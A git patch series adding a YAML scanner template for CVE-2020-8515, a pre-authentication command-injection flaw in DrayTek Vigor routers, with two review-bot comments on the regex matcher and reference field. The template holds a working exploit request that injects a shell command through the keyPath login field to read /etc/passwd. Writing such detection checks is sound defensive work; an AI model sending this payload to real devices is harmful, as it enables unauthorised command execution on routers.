From ee82f8364e49a10a4a9eb72941779290192adea9 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 28 Jan 2021 15:30:20 +0000
Subject: [PATCH 1/2] Create CVE-2020-8515
---
cves/2020/CVE-2020-8515 | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 cves/2020/CVE-2020-8515
diff --git a/cves/2020/CVE-2020-8515 b/cves/2020/CVE-2020-8515
new file mode 100644
index 0000000000..5eed7ce4ae
--- /dev/null
+++ b/cves/2020/CVE-2020-8515
@@ -0,0 +1,28 @@
+id: CVE-2020-8515
+
+info:
+ name: DrayTek pre-auth RCE
+ author: pikpikcu
+ severity: critical
+
+ # References:
+ # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
+ # https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/mainfunction.cgi HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
From 81891e9cbd3433bcf656c4ffc1a953d82476828e Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Fri, 29 Jan 2021 00:23:43 +0530
Subject: [PATCH 2/2] file name update
---
cves/2020/{CVE-2020-8515 => CVE-2020-8515.yaml} | 5 +++++
1 file changed, 5 insertions(+)
rename cves/2020/{CVE-2020-8515 => CVE-2020-8515.yaml} (83%)
diff --git a/cves/2020/CVE-2020-8515 b/cves/2020/CVE-2020-8515.yaml
similarity index 83%
rename from cves/2020/CVE-2020-8515
rename to cves/2020/CVE-2020-8515.yaml
index 5eed7ce4ae..7ed50489fd 100644
--- a/cves/2020/CVE-2020-8515
+++ b/cves/2020/CVE-2020-8515.yaml
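Review bot: The regex matcher `root:[x*]:0:0:` in the new template only fires when root's password field is exactly `x` or `*`, so a vulnerable device whose /etc/passwd carries a hash in that field would be reported as clean. Embedded firmware frequently has no shadow file, though whether that holds for the affected Vigor models is not visible from this patch. Loosening the line to `- "root:.*:0:0:"` keeps the uid/gid anchor while removing that false negative for anyone scanning their own fleet.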
@@ -4,6 +4,7 @@ info:
 name: DrayTek pre-auth RCE
 author: pikpikcu
 severity: critical
+ reference: https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
 # References:
 # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
@@ -26,3 +27,7 @@ requests:
 regex:
 - "root:[x*]:0:0:"
 part: body
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
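Review bot: The added `reference:` field carries only the Netlab write-up, while the vendor advisory stays in the `# References:` comment block kept as context just below it, so the sources are now split between a machine-readable field and a comment. Listing both URLs under `reference:` (as a YAML list, if the template schema accepts one) and dropping the comment block would keep the metadata in one place. The vendor advisory is presumably where remediation guidance lives, so it is the link a defender acting on a positive result most needs surfaced.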